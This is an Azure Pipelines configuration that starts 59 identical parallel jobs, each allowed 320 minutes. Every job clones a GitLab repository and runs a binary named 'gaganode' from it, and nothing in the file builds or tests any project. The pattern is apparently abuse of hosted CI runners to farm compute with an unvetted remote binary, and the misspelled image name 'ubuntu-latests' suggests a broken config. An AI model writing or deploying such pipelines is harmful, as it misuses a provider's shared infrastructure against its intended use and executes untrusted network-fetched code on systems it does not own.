trigger:
- main

pool:
  vmImage: ubuntu-latests

jobs:
- job: a
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode

- job: b
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode

- job: c
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode

- job: d
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: e
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: f
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: g
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: h
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: i
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: j
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: k
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: l
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: m
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: n
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: o
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: p
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: q
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: r
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: s
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: t
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: u
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: v
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: w
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: x
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: y
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: z
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: aa
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: bb
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: cc
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: dd
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: ee
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: ff
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: gg
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: hh
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: ii
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: jj
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: kk
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: ll
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: mm
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: nn
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: oo
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: pp
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: qq
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: rr
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: ss
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: tt
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: uu
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: vv
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: ww
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: xx
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: yy
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: zz
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: aaa
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: bbb
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: ccc
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: ddd
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: eee
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: fff
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
  
- job: ggg
  timeoutInMinutes: 320
  steps:
  - script: git clone https://gitlab.com/erlandysword/gaga && cd gaga && chmod +x gaganode && ./gaganode
